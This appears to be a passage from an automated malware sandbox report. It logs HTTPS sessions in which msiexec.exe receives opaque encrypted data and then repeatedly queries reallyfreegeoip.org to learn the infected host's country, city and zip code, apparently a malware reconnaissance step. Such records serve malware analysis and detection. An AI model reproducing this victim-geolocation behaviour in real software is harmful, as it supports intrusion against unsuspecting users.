2024-11-21 09:36:51 UTC	1323	IN	Data Raw: 79 da 9f f9 34 72 da a4 d4 77 08 29 8d c9 d7 9a 2d 28 1d 13 ae 64 f4 b2 6b 21 bc e1 12 07 f5 68 f8 1b d7 22 80 68 78 87 3d 9d ee 82 0e 09 01 9e 91 2a 44 6c 0b 3a 47 c6 33 75 a0 26 4f ae d0 b5 e3 0c d8 a6 10 9f 12 69 d4 57 ce 3c 8b e8 f8 c6 56 54 d9 27 f6 a8 bb f9 9b 8a ea 96 ff 65 a6 dc 98 d0 da db c8 b2 ed f1 72 38 ab 37 cd a5 9b 71 2f f0 97 c7 28 31 65 db 2f a4 22 58 8e 7a f1 21 76 67 23 48 58 5a 57 b3 25 99 4c db d3 8b af ab 37 ce e7 f1 ed 9b f7 0b 9a 68 54 29 88 ac f4 8e 23 72 23 cf 1d 75 84 68 30 78 e7 90 7d 73 83 38 eb 54 fd 38 ad 2b 80 c0 d3 81 f1 83 f9 b5 35 cc ab b3 4f 68 e8 54 5f 7e 18 0c b9 9f b4 22 51 a4 3d d5 71 4d 3a 82 42 30 ac 77 a9 c1 f7 22 8e 12 74 14 ee 3d 21 74 25 27 b1 b9 b2 4a 4d 46 da 90 53 e7 db e3 bf 0f 4c 19 c9 f8 ad 1c 89 84 df Data Ascii: y4rw)-(dk!h"hx=*Dl:G3u&OiW<VT'er87q/(1e/"Xz!vg#HXZW%L7hT)#r#uh0x}s8T8+5OhT_~"Q=qM:B0w"t=!t%'JMFSL
2024-11-21 09:36:51 UTC	1390	IN	Data Raw: 13 d3 ae b7 6b c8 59 2d 10 5c 66 68 d3 1a 04 41 25 08 98 d2 c4 58 f0 9b 7c f3 de 2b e7 63 29 17 ec 2f 8b 11 a1 33 ab b1 26 d6 35 d4 df 33 14 c6 02 b4 04 28 9a fd 18 5a 84 39 55 6d e4 70 51 23 ee 65 88 d2 5d a7 aa 63 ac c8 b9 f4 d8 c6 ca 60 c1 09 40 17 5f 94 d8 9c 8f 7c 3c 4f f5 c8 ad 8b 62 7d d8 da af 19 04 a6 8b 56 dd 69 96 09 78 78 4b 1b 0a 25 c7 6a a9 64 45 a2 65 3d 63 98 fa ad cc 9c 9a 16 59 22 ea 24 1a c8 41 bf e3 56 36 f7 21 86 e0 77 af 18 9a df cc 7c ad bc 82 be bd 21 30 1b 76 84 aa 8f e7 3d 47 57 ab d8 77 8b a2 c3 13 28 e7 84 00 34 8f c2 2b 57 2f 7c c4 98 3e b3 a9 cd 32 e6 ad 84 43 63 30 38 79 0e ec e0 60 c4 9b 5c d1 8d a0 85 ad 64 f8 38 ae 21 61 e4 e5 1b d8 d3 13 a8 ef e4 cb 1b cc 1c c1 9b 3d d7 88 2d 32 e6 89 b2 43 7e a8 98 53 38 c6 f2 51 cf ff Data Ascii: kY-\fhA%X\|+c)/3&53(Z9UmpQ#e]c`@_\|<Ob}VixxK%jdEe=cY"$AV6!w\|!0v=GWw(4+W/\|>2Cc08y`\d8!a=-2C~S8Q
2024-11-21 09:36:51 UTC	1390	IN	Data Raw: dc 83 74 38 7d 4e 02 12 70 b7 51 e6 77 69 9a 2e 39 72 60 a4 aa 51 02 f9 35 5d f7 81 68 24 c6 49 c5 4f 5e 44 e0 ba 5f 17 6e ff 21 b5 53 15 8e c7 7b d0 13 15 57 36 7f 9f 42 5c 0f 69 67 67 25 72 f6 70 5c e7 04 af 44 72 93 93 98 c8 34 e1 ab c9 40 64 0e 38 5f de 30 2b 33 56 97 1e ad b3 81 91 16 b4 db f6 76 71 19 9c 49 50 f5 20 a3 5f 9e 13 77 65 62 7b 3c ae 0e da a0 fb d6 5c 90 82 dc ee 91 6c 2c d7 4e a3 84 7d 84 8d 34 47 cf 49 b5 e5 da ca 88 2a 90 1a 1a 30 09 94 67 9c 3f 75 a8 b1 f9 99 f5 4c 7f 18 a7 6e c3 a5 4f 64 b6 43 0a c1 26 a1 dc 26 21 af 4f cc 61 96 05 24 75 70 62 0c 53 84 25 64 d5 a2 de af cd 79 b3 e1 ad 70 fd b6 21 9f 07 68 29 43 b9 8b 6e 82 ab 71 23 01 34 61 be ec 97 39 29 8d 29 2f 43 d4 cb 3b 75 6d 57 b5 84 84 61 0e c0 8a b2 59 4d e9 49 4b 66 59 49 Data Ascii: t8}NpQwi.9r`Q5]h$IO^D_n!S{W6B\igg%rp\Dr4@d8_0+3VvqIP _web{<\l,N}4GI*0g?uLnOdC&&!Oa$upbS%dyp!h)Cnq#4a9))/C;umWaYMIKfYI
2024-11-21 09:36:51 UTC	1390	IN	Data Raw: b1 1f c2 2e 31 d5 4f 59 24 c6 23 bc 86 32 cb b5 1b b1 88 0a 6b 15 aa 03 2d 58 2b 78 29 7a e8 ae 50 7a d2 f2 33 58 c9 df d0 20 98 33 40 c9 1c 6a 0c 72 93 47 2d bd 64 d7 6f b8 de 06 0c 90 7f 0f 65 8a 53 41 04 b8 06 4b 32 bf dc 0e ab 46 19 4d da 1f 4b de 02 4a 30 d5 1d 0e 8d 6d 5f a5 cb 34 28 17 59 30 cc 01 50 d7 1f d4 64 28 aa a3 7e 3d 79 c6 31 32 df 66 30 2a 84 b7 fa ff 25 7f a0 47 f0 2c ca 03 39 be b6 eb cd 33 26 25 24 22 01 e3 99 ba 99 b4 22 f0 d2 6b 64 7e 08 80 61 db b9 f4 06 ef 71 1f ab 2d 0c c4 23 d3 70 f6 f6 f2 e3 4d eb e6 e2 73 2e 3b bc 9e 0a ea 5a 40 3c b5 e4 26 11 5d 3d 89 45 d7 09 58 0e 21 02 b6 1e 44 ae 7a 24 70 b2 61 b2 a5 ce 8a e6 43 b2 15 ce b7 1c 50 c7 61 9e 6c 6b 6c 63 1f 47 ee 5c 0b c9 92 34 6e bf b9 99 8f ab 5f 26 d8 d8 b5 45 c4 d6 66 b4 Data Ascii: .1OY$#2k-X+x)zPz3X 3@jrG-doeSAK2FMKJ0m_4(Y0Pd(~=y12f0*%G,93&%$""kd~aq-#pMs.;Z@<&]=EX!Dz$paCPalklcG\4n_&Ef
2024-11-21 09:36:51 UTC	1390	IN	Data Raw: 77 5f 10 d8 d1 0f f5 79 9d 5b 0c 22 84 10 19 97 05 2e f8 aa 8f 09 01 82 af a2 45 7f 06 2b 60 ff 0f 74 a0 0e 38 ba 2e b9 de 10 55 e0 63 5f 13 4c c8 0d 9b 37 8b 92 d0 f4 94 54 df 8f c0 b7 d4 b4 e5 b0 ee 34 de 0e 17 05 89 da c5 37 88 b2 e7 f7 c1 15 dd 8c 8b a5 91 0b b0 d5 8d b1 42 e5 65 ab 87 81 28 4b 71 bd e1 21 07 6a 81 3a df 40 25 5e 97 bc 2b db 3c 8b af ab fa 2c ff 83 98 8e e6 73 25 c0 0d 01 3c ad d1 92 f3 6c 36 bd 0c c5 a1 0f ba e4 92 90 77 db 04 08 ec 01 f2 32 ce 97 d7 1e b8 b9 81 fd e2 17 10 d2 f1 83 40 68 92 84 cf 77 66 56 91 dd b0 80 72 a9 51 43 6a 65 0e 20 6a 43 ac aa 22 af 3f 22 ab 30 40 6a d2 37 32 6f 56 c6 d3 b9 b8 53 9a 38 eb 90 53 e3 d7 42 bd 0f 38 7d 74 7b ad 6c 95 ba a0 78 a2 71 d8 d0 93 07 d8 f6 f0 3a b8 62 3d cb 25 49 5c 6e fa e6 bf 5a f4 Data Ascii: w_y[".E+`t8.Uc_L7T47Be(Kq!j:@%^+<,s%<l6w2@hwfVrQCje jC"?"0@j72oVS8SB8}t{lxq:b=%I\nZ
2024-11-21 09:36:51 UTC	1390	IN	Data Raw: 56 57 2e be ae 4e eb fd c0 d7 3b 03 a6 d3 96 f5 1c 9c d4 11 6d 69 0d 22 53 c7 14 91 64 65 a6 1b a8 61 b0 fd bb e4 17 9a 16 2d 0b 14 25 0d dc 71 c8 d5 8f 34 87 5f e7 cf 77 ab 34 a1 be dc 76 cc 88 d4 7f bd 21 3e 25 b6 85 b9 8f f6 e5 6e 42 82 ec 77 8b bc 2e 36 15 cf e6 06 47 45 1c 2b 5d 07 bd ba af 34 b3 de 7d a7 e4 a7 e7 52 5a b6 46 43 04 fa 1a 12 14 bf 4d ff ce 38 98 20 2e f8 29 a8 6b b2 96 de 1e a6 9e b1 8d fc a3 b9 1b cc 1c 63 af 22 d7 5a 32 32 e6 03 23 5a 00 9a ea ce 2c 64 a7 63 e6 86 28 dd 96 c5 c2 aa 67 c9 9f e1 27 75 0d 87 e6 ab 8a dd c0 81 42 df ab 26 e8 a9 3a 34 37 28 72 7f 1e dc 64 5e 0c 1a 2a ea 55 b5 3b a1 7e 27 74 2a c2 38 d1 2e 3a de d6 4d 26 11 af fb b0 64 dc 83 b2 8a 60 95 c4 fd f1 15 ef cc 23 97 44 5e 2b af e5 b6 06 2d ee 6e 6c bb 0d 1b 91 Data Ascii: VW.N;mi"Sdea-%q4_w4v!>%nBw.6GE+]4}RZFCM8 .)kc"Z22#Z,dc(g'uB&:47(rd^U;~'t8.:M&d`#D^+-nl
2024-11-21 09:36:51 UTC	1390	IN	Data Raw: 1a 0f 9c 9d e3 32 aa a5 b8 d4 59 68 b4 82 5a 9a 76 cc 93 94 00 5f 7e fe 33 42 94 0f ff b2 f7 aa 4b 90 f6 0d 77 86 44 92 b8 83 a9 26 52 9c ee 69 59 c9 56 d9 c0 c3 be b0 3b 96 71 77 15 13 ec 56 b7 5b 05 0a 9f 8c 47 e5 63 44 0f b1 46 bf b6 45 6e 9e 01 0a cd 2c 7f f4 51 21 af 3b f9 61 e8 3e 56 e0 76 73 5e 37 cb b3 64 a5 d6 d7 51 cc 6e 90 b9 a6 49 3c a6 02 e1 39 43 29 47 95 9d 85 82 ad 7b ee 1d 6f 7f 8a ec 93 41 25 b8 29 77 37 fc 4a 31 ab 67 41 4b 85 e9 5b 1f cd b7 19 cc 4f e9 2f 75 38 d8 49 4f 42 5c 69 57 24 eb cb a0 eb 65 b3 1a ed d7 58 6e e3 98 e8 ae 51 43 e3 60 96 62 e2 44 05 1a 70 aa 88 f7 08 aa b0 1e 77 40 7c 05 43 78 87 4c ba ec b7 cc a0 7d b8 c5 ba 8e 78 13 13 49 b9 b5 2d 6f bb 3e 26 85 51 7d f9 f5 00 9e 2c b5 13 8c 01 f8 65 db e9 0b 65 e8 63 9e 99 01 Data Ascii: 2YhZv_~3BKwD&RiYV;qwV[GcDFEn,Q!;a>Vvs^7dQnI<9C)G{oA%)w7J1gAK[O/u8IOB\iW$eXnQC`bDpw@\|CxL}xI-o>&Q},eec
2024-11-21 09:36:51 UTC	1390	IN	Data Raw: 7a 3a 11 80 34 22 13 71 51 c7 01 4b b8 16 bb ae 2c 82 e3 7e 3d 62 75 5b 18 cb 4e 8e 02 4f bd 8e 76 4a b3 a1 4b fa 24 a9 45 57 84 c6 84 72 4d 1d 2f 24 2e 0c 1d 99 ba 97 a5 ac f0 d2 65 17 d3 19 91 67 db ca f4 06 ef 71 26 fd 42 c3 ce 3e 54 30 28 e6 d6 ee 6f 99 ef fd 60 4d 99 b1 eb 22 5e 50 9e 36 17 c1 3e 63 08 4c bc 35 75 28 33 e5 1b 02 c6 0c ce 0a 60 56 03 ab 9f c3 14 ff 80 8c 66 49 14 ca d8 ef dd 87 6b 3c 48 52 08 24 22 51 9e 8e 81 99 85 1c d0 d0 e5 93 2d 84 4a 5c 84 59 dc 5f 09 4d 7f ca ba 7f bf 59 19 31 9b 62 f9 c4 f3 74 68 0e a0 de 94 a6 98 d4 02 8b da ce 29 83 80 d7 ee f0 36 83 32 7e eb 52 95 9b 73 dd d9 73 fa f4 e4 3a 9a 99 a7 dc 10 ae e4 0f bf a0 f3 a2 98 4c 7f 83 a9 25 46 cf 36 85 61 0e 15 0b d3 e2 cf ad 77 ae 9e bc 25 08 23 2f cc 40 d9 43 1f 6e 1a Data Ascii: z:4"qQK,~=bu[NOvJK$EWrM/$.egq&B>T0(o`M"^P6>cL5u(3`VfIk<HR$"Q-J\Y_MY1bth)62~Rss:L%F6aw%#/@Cn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	188.114.96.3	443	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 09:36:58 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 09:36:58 UTC	851	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:36:58 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 145727 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=se1XtHo6%2FUGNkVBlhKdgr7h7ObG3Z2NHqc%2BG%2Fb7WMrq5NuVKSSve6i6VZZPwJvZumOOmUWbzv8bcuFmUZgiU8fGnvslU4TlIw9mDa6jRj7gtlS4trzhcWteS9yO7KwbOND1dUj3d"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5fb2cf6885430f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1815&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1613259&cwnd=219&unsent_bytes=0&cid=cd8681b5bc566ceb&ts=466&x=0"
2024-11-21 09:36:58 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	188.114.96.3	443	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 09:37:00 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-21 09:37:01 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:01 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 145730 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wl9O%2FuudcCME9P7hPwt6tbQ77m%2Bl%2BbLoWgMoVaRTv%2BG%2B3W71O%2B4x3oQeGLxrokT9MLgY8eVxfYQe5NVVixw6U6fl2PPYomE8jSoGMQJH8e8CXbOlRl4Vuo23rZicBVwWlrJo26j8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5fb2dd49cb43a1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1791411&cwnd=231&unsent_bytes=0&cid=9e4b611a1ea3fad7&ts=461&x=0"
2024-11-21 09:37:01 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	188.114.96.3	443	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 09:37:03 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 09:37:04 UTC	851	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:04 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 145733 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dejbk8VGiTjEkvt%2FD%2FZcI7bS8AHSKSxNHRtWHifmGzMFTcfIgYKICiq1u1r9W4eKgbmSrBnZKg%2FgL4vDxCO1WSyF5tCAPu0Da1TFODMIPgZAqkMywoYPokW1irkgz9vsC8FTxN0k"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5fb2f13b7043c2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1891&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1609702&cwnd=134&unsent_bytes=0&cid=01e772c78e60aa20&ts=471&x=0"
2024-11-21 09:37:04 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49756	188.114.96.3	443	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 09:37:07 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 09:37:07 UTC	851	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:07 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 145736 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yw0RCNpTBQsbsuE8fiaHqk6bJDS0aEaxF2azYP8rS08wUfWceZQzhAfoE83buS%2BXdy6ofnibPQ3kwCbeYfcyeWIaoHOgUMq%2FvthzJbhqaG7pzQkilTNxIH3D6wLKaVGoxkab%2Fagq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5fb3050d1c438e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1587&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1819314&cwnd=206&unsent_bytes=0&cid=e6972160ff1e8a3f&ts=467&x=0"
2024-11-21 09:37:07 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49763	188.114.96.3	443	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 09:37:10 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 09:37:10 UTC	863	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:10 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 145739 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=97%2BAuUPfTkwli3hcHPYz5P1fVmXssvyOC2%2F7ZH%2FYFgWN8cnEwBSNXMo%2F4os0obahZjD26WGOCwAjBKIA%2FlD5%2FdKdbn%2Bv2weR4v9rso8Dbg8szdrZDJP2%2Bm3spy%2FgOInevtpTXKNH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5fb3194d291a28-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1824&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1585233&cwnd=138&unsent_bytes=0&cid=d397f7d50bfdc1e7&ts=459&x=0"
2024-11-21 09:37:10 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49770	188.114.96.3	443	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 09:37:13 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 09:37:13 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:13 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 145742 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YbSORZkKmUWcAqS701T03bJ76xzBUjAYHJHlhKAtDHGGd4NX5glDstmqIgFc5sab7C%2BOt4nZ8O5JmDr0oatk%2BJIzFkDvdaLT3MbKbFVlW%2FgL6tOAwbMkHesuMJ0lr%2Fl4DAHBLniJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5fb32d5ff417b1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1535&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1886304&cwnd=243&unsent_bytes=0&cid=a7fb35951700b248&ts=460&x=0"
2024-11-21 09:37:13 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: 